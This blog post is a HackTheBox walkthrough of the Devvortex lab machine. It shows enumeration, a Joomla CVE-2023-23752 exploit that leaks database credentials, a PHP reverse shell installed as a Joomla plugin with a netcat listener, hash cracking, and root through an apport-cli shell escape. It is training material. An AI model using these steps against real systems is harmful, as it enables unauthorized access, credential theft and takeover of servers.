Matteo Basso - kraba
Posts Tags Pentesting Sysadmin About
Matteo Basso - kraba

Contents

HackTheBox : Devvortex WriteUp

 included in pentesting
   2262 words   11 minutes 

This is my writeup for the Devvortex machine of hackthebox.com platform. The machine was retired today…so it’s now possible to publish a writeup. Remember this is just how I solved/owned the machine, maybe there are different and fast paths but…

It’s an easy machine and the path to follow is pretty straight forward (too much for HTB?). Remember to add the IP/Host in your /etc/hosts!

Recon

First of all I run a classic nmap scan:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19

nmap -sC -sV -p- devvortex.htb     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-20 04:27 EDT
Nmap scan report for devvortex.htb (10.10.11.242)
Host is up (0.083s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: DevVortex
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.92 seconds

And let’s move to check the web server directories and subdomain (it’s usual in htb…)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

gobuster dir -u http://devvortex.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://devvortex.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 178] [--> http://devvortex.htb/images/]
/css                  (Status: 301) [Size: 178] [--> http://devvortex.htb/css/]
/js                   (Status: 301) [Size: 178] [--> http://devvortex.htb/js/]


wfuzz -c -z file,/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hc 404,301,302 -u http://devvortex.htb -H "Host: FUZZ.devvortex.htb"   
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://devvortex.htb/
Total requests: 114441

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                    
=====================================================================

000000019:   200        501 L    1581 W     23221 Ch    "dev"

The website on the port 80 it’s just a classic website:

../images/htb-devvortex/00.png
index.html

But…there is a subdomain called dev (remember to add it to the /etc/hosts), let’s add it to the hosts file and check it:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17

curl -i -L http://dev.devvortex.htb/         

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 20 Apr 2024 08:33:41 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: 1daf6e3366587cf9ab315f8ef3b5ed78=6f4aed3sc567h1q6eemdfkoa3a; path=/; HttpOnly
x-frame-options: SAMEORIGIN
referrer-policy: strict-origin-when-cross-origin
cross-origin-opener-policy: same-origin
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Last-Modified: Sat, 20 Apr 2024 08:33:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

or via browser:

../images/htb-devvortex/01.png
api

I run again gobuster on it in order to check some other directories or pages:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

gobuster dir -u http://dev.devvortex.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://dev.devvortex.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/images/]
/home                 (Status: 200) [Size: 23221]
/media                (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/media/]
/templates            (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/templates/]
/modules              (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/modules/]
/plugins              (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/plugins/]
/includes             (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/includes/]
/language             (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/language/]
/components           (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/components/]
/api                  (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/api/]
/cache                (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/cache/]
/libraries            (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/libraries/]
/tmp                  (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/tmp/]
/layouts              (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/layouts/]
/administrator        (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/administrator/]

The /api and /administrator directories seem interesting, let’s check the /api one:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

curl -sv http://dev.devvortex.htb/api/info
* Host dev.devvortex.htb:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.11.242
*   Trying 10.10.11.242:80...
* Connected to dev.devvortex.htb (10.10.11.242) port 80
> GET /api/info HTTP/1.1
> Host: dev.devvortex.htb
> User-Agent: curl/8.5.0
> Accept: */*
> 
< HTTP/1.1 404 Not Found
< Server: nginx/1.18.0 (Ubuntu)
< Date: Sat, 20 Apr 2024 08:42:33 GMT
< Content-Type: application/vnd.api+json; charset=utf-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< x-frame-options: SAMEORIGIN
< referrer-policy: strict-origin-when-cross-origin
< cross-origin-opener-policy: same-origin
< X-Powered-By: JoomlaAPI/1.0
< Expires: Wed, 17 Aug 2005 00:00:00 GMT
< Last-Modified: Sat, 20 Apr 2024 08:42:33 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< 
* Connection #0 to host dev.devvortex.htb left intact
{"errors":[{"title":"Resource not found","code":404}]}

I’m in front of a Joomla installation, let’s check the /administration directory:

../images/htb-devvortex/02.png
admin

And it’s a Joomla! Thanks to hacktricks I’ll check the version of Joomla just getting the joomla.xml:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

curl -sv http://dev.devvortex.htb/administrator/manifests/files/joomla.xml
* Host dev.devvortex.htb:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.11.242
*   Trying 10.10.11.242:80...
* Connected to dev.devvortex.htb (10.10.11.242) port 80
> GET /administrator/manifests/files/joomla.xml HTTP/1.1
> Host: dev.devvortex.htb
> User-Agent: curl/8.5.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Server: nginx/1.18.0 (Ubuntu)
< Date: Sat, 20 Apr 2024 08:46:18 GMT
< Content-Type: text/xml; charset=utf-8
< Content-Length: 1556
< Last-Modified: Tue, 13 Dec 2022 12:15:44 GMT
< Connection: keep-alive
< ETag: "63986cf0-614"
< Accept-Ranges: bytes
< 
<?xml version="1.0" encoding="UTF-8"?>
<extension type="file" method="upgrade">
        <name>files_joomla</name>
        <author>Joomla! Project</author>
        <authorEmail>admin@joomla.org</authorEmail>
        <authorUrl>www.joomla.org</authorUrl>
        <copyright>(C) 2019 Open Source Matters, Inc.</copyright>
        <license>GNU General Public License version 2 or later; see LICENSE.txt</license>
        <version>4.2.6</version>
        <creationDate>2022-12</creationDate>
        <description>FILES_JOOMLA_XML_DESCRIPTION</description>

        <scriptfile>administrator/components/com_admin/script.php</scriptfile>
.....

Initial foothold

I checked if there is a CVE with this particular version of Joomla (4.2.6) and…b|doom:

https://vulncheck.com/blog/joomla-for-rce

I checked for an exploit too and i found the Acceis/exploit-CVE-2023-23752 on github as usual:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22

ruby exploit.rb http://dev.devvortex.htb

Users
[649] lewis (lewis) - lewis@devvortex.htb - Super Users
[650] logan paul (logan) - logan@devvortex.htb - Registered

Site info
Site name: Development
Editor: tinymce
Captcha: 0
Access: 1
Debug status: false

Database info
DB type: mysqli
DB host: localhost
DB user: lewis
DB password: P4ntherg0t1n5r3c0n##
DB name: joomla
DB prefix: sd4fg_
DB encryption 0

Well, the exploit gave me a lot of info: the username/password of the admin, another user and a mysql login too. I tried to login with the given username and password (lewis/P4ntherg0t1n5r3c0n##) and it' working:

../images/htb-devvortex/03.png
joomla

Now I have several ways to start a reverse shell in PHP but, after further investigation, the only way is uploading a plugin. The themes way (uploading a PHP shell into the theme) is not possible, due to the file permission (just read). To create a plugin for Joomla I found a good article, first of all I downloaded the reverse shell from Pentestmonkey and I changed IP/port of my listener of course. I renamed it shell.php.

The next step in order to create a Joomla plugin is creating an empty index.html file and the proper shell.xml file:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

touch index.html

vi shell.xml          
<?xml version="1.0" encoding="utf-8"?>
<extension version="4.0" type="plugin" group="content">
        <name>shell</name>
        <author>gesu</author>
        <description>rev shell</description>
        <version>1.3</version>
        <files>
                <filename plugin="shell">shell.php</filename>
                <filename>index.html</filename>
        </files>
</extension>

And zip shell.php, shell.xml and index.html into a shell.zip file. Now I moved from the GUI to System –> Install –> Extension (http://dev.devvortex.htb/administrator/index.php?option=com_installer&view=install) and I uploaded the shell.zip file:

../images/htb-devvortex/04.png
shell.zip

I started my listener and I moved to System –> Manage –> Plugins, I searched for “shell” and ticked/enabled it:

../images/htb-devvortex/05.png
plugins

I moved to my listener and:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

nc -nvlp 6666   
                 
listening on [any] 6666 ...
connect to [10.10.16.46] from (UNKNOWN) [10.10.11.242] 51252
Linux devvortex 5.4.0-167-generic #184-Ubuntu SMP Tue Oct 31 09:21:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
 10:32:54 up 45 min,  0 users,  load average: 0.02, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ pwd
/
$ uname -a
Linux devvortex 5.4.0-167-generic #184-Ubuntu SMP Tue Oct 31 09:21:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
$ python3 -c 'import pty; pty.spawn("/bin/bash")'  
www-data@devvortex:/$

I’m in as www-data! It worked!

First thing: I have a DB pass, let’s try it!

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50

mysql -u lewis joomla -p
mysql -u lewis joomla -p
Enter password: P4ntherg0t1n5r3c0n##

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 231
Server version: 8.0.35-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2023, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show tables;
show tables;
+-------------------------------+
| Tables_in_joomla              |
+-------------------------------+
| sd4fg_action_log_config       |
...
| sd4fg_updates                 |
| sd4fg_user_keys               |
| sd4fg_user_mfa                |
| sd4fg_user_notes              |
| sd4fg_user_profiles           |
| sd4fg_user_usergroup_map      |
| sd4fg_usergroups              |
| sd4fg_users                   |
| sd4fg_viewlevels              |
...
+-------------------------------+
71 rows in set (0.00 sec)

mysql> select * from sd4fg_users;
;
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
| id  | name       | username | email               | password                                                     | block | sendEmail | registerDate        | lastvisitDate       | activation | params                                                                                                                                                  | lastResetTime | resetCount | otpKey | otep | requireReset | authProvider |
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
| 649 | lewis      | lewis    | lewis@devvortex.htb | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u |     0 |         1 | 2023-09-25 16:44:24 | 2024-04-20 10:21:08 | 0          |                                                                                                                                                         | NULL          |          0 |        |      |            0 |              |
| 650 | logan paul | logan    | logan@devvortex.htb | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 |     0 |         0 | 2023-09-26 19:15:42 | NULL                |            | {"admin_style":"","admin_language":"","language":"","editor":"","timezone":"","a11y_mono":"0","a11y_contrast":"0","a11y_highlight":"0","a11y_font":"0"} | NULL          |          0 |        |      |            0 |              |
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
2 rows in set (0.00 sec)

mysql>

Oh well, I found the hash of the other user logan. Let me check the /etc/passwd:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false
logan:x:1000:1000:,,,:/home/logan:/bin/bash
_laurel:x:997:997::/var/log/laurel:/bin/false

www-data@devvortex:/$ ls -ltra /home    
ls -ltra /home
total 12
drwxr-xr-x  3 root  root  4096 Sep 26  2023 .
drwxr-xr-x 19 root  root  4096 Oct 26 15:12 ..
drwxr-xr-x  3 logan logan 4096 Nov 21 11:04 logan

The user logan has an account. Maybe…maybe…

I used hasesh.com in order to identify the correct hash type of $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 (logan’s hash):

1

$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 - tequieromucho - Possible algorithms: bcrypt $2*$, Blowfish (Unix)

Ops…the hash was cracked/solved.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

ssh logan@devvortex.htb
logan@devvortex.htb's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-167-generic x86_64)

...

Last login: Sat Apr 20 10:37:44 2024 from 10.10.14.56
logan@devvortex:~$ whoami
logan
logan@devvortex:~$ cat user.txt 
57REDACTED74

user done!

Privilege Escalation

Let’s check if I have some sudo commands enabled…

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

logan@devvortex:~$ sudo -l
[sudo] password for logan: 
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli
    
logan@devvortex:~$ apport-cli --version
2.20.11

apport-cli? Let me check for CVE and…I found an X tweet explaining the CVE-2023-1326. Let’s try:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

logan@devvortex:~$ touch /tmp/xxx.crash
logan@devvortex:~$ sudo apport-cli -c /tmp/xxx.crash less

*** Collecting problem information

The collected information can be sent to the developers to improve the
application. This might take a few minutes.
.....................

*** Send problem report to the developers?

After the problem report has been sent, please fill out the form in the
automatically opened web browser.

What would you like to do? Your options are:
  S: Send report (1.6 KB)
  V: View report
  K: Keep report file for sending later or copying to somewhere else
  I: Cancel and ignore future crashes of this program version
  C: Cancel
Please choose (S/V/K/I/C): !

What would you like to do? Your options are:
  S: Send report (1.6 KB)
  V: View report
  K: Keep report file for sending later or copying to somewhere else
  I: Cancel and ignore future crashes of this program version
  C: Cancel
Please choose (S/V/K/I/C): v

(write !/bin/bash)

root@devvortex:/home/logan#

So, I touched a xxx.crash, ran apport-cli, pressed ! , pressed v and wrote !/bin/bash…done

1
2
3
4

root@devvortex:/home/logan# whoami
root
root@devvortex:/home/logan# cat /root/root.txt 
ffREDACTED43

and root done!

Updated on 2024-04-27
Read Markdown
 htbpentestingwriteup
Back | Home